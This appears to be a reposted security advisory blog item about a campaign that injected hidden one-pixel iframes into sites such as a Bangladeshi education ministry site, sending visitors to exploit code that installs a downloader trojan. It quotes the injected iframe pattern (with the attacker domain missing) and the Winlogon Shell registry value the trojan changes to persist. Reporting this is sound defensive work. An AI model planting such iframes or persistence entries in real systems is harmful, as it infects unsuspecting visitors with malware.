Tortures Web Surfers

Over the past several weeks, a multitude of sites have been injected with malicious iframes that point to exploit code (which leads to downloader trojans) located on the attacker-owned ‘’. The form is always the same:

iframe src=\”\” width=1 height=1 style=\”visibility:hidden;position:absolute\

where random is a numeric identifier that differs with each site compromised.

The most recently discovered victim of iframe injection is the website of the Bangladesh Directorate of Primary Education, The Nigerian Tribune ( is also among those sites compromised in injection attacks.

The attack site delivers the malware intermittently, remaining dormant in between attacks. The trojan downloader delivered via the attacks modifies the Winlogon Shell = Explorer value as follows:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Value: Shell = Explorer.exe <path to downloader>

By default, the value should read simply “Shell = Explorer.exe” with no additional file specificed.

As it’s name suggests, a downloader trojan downloads additional malware to the infected computer. Most of today’s malware consists of remotely configurable data theft trojans. Heartland Payment Systems is the poster child for what today’s malware is capable of doing.

Alexbtp – Anderson_neo – Tong hop tu internet

  1. Không có bình luận
  1. No trackbacks yet.

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập: Logo

Bạn đang bình luận bằng tài khoản Đăng xuất /  Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )


Connecting to %s

%d bloggers like this: